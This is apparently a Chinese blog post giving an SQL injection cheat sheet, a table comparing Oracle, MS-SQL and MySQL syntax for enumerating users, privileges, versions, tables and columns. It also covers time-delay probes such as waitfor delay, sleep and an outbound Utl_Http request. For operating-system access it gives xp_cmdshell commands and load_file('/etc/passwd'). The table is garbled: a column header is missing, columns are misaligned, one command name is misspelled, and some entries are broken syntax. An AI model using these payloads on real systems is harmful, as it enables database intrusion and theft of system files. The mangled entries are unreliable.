MS-SQL
| MySQL
| ASCII和substring
| ASCII(‘A‘)
SUBSTR(‘ABCDE‘,2,3) | ASCII(‘A‘)
SUBSTRING(‘ABCDE‘,2,3) | ASCII(‘A‘)
SUBSTRING(‘ABCDE‘,2,3) |
获取当前数据库用户
| Select Sys.login_user from dual SELECT user FROM dual SYS_CONTEXT(‘USERENV‘,‘SESSION_USER‘)
| select suser_sname()
| SELECT user()
|
引起时间延迟
| Utl_Http.request(‘http://xx.com‘)
| waitfor delay ‘0:0:10‘ exec master..xp_cmdshell ‘ping localhost‘
| sleep(100)
|
获取数据库版本
| select banner from v$version
| select @@version
| select @@version |
获取当前数据库
| SELECT SYS_CONTEXT(‘USERENV‘,‘DB_NAME‘) FROM dual
| select db_name() 获取服务器名: select @@servername
| Select database()
|
获取当前用户权限
| SELECT privilege FROM session_privs
| SELECT grantee,table_name,privilege_type FROM INFORMATION_SCHEMA.TABLE_PRIVILEGES
| SELECT * FROM information_schema.user_privileges WHERE grantee=‘[user]‘ 此处[user]由SELECT user()的输入决定
|
显示所有表和列
| Select table_name||‘ ‘||column_name from all_tab_columns
| SELECT table_name+‘ ‘,column_name from information_schema.columns
| SELECT CONCAT+‘ ‘,column_name from information_schema.columns |
显示用户对象
| Select object_name,object_type from user_objects
| SELECT name FROM sysobjects
| SELECT table_name FROM information_schema.tables(或trigger_name from information_schema.triggers等)
|
显示用户表
| Select object_name,object_type from user_objects WHERE object_type=‘TABLE‘或者显示用户访问的所有表:SELECT table_name FROM all_tables
| SELECT name FROM sysobjects WHERE xtype=‘U‘
| SELECT table_name FROM information_schema.tables where table_type=‘BASE TABLE‘ and table_schema!=‘mysql‘
|
显示表foo的列名
| Select column_name,Name from user_tab_columns where table_name=‘foo‘如果目标数据不为当前应用程序用户所有,使用ALL_table_columns表
| SELECT column_name FROM information_schema.columns WHERE table_name=‘foo‘
| SELECT column_name FROM information_schema.columns WHERE table_name=‘foo‘ |
与操作系统交互(最简单的方式)
| 请参考David Litchfield所著的The Oracle Hacker‘s Handbook一书
| exec xp_cmshell ‘dir c:\‘
| select load_file (‘/etc/passwd‘)
|
本文出自 “saluteiceman” 博客,请务必保留此出处http://maxvision.blog.51cto.com/6269192/1695002
SQL语法
标签:sql injection
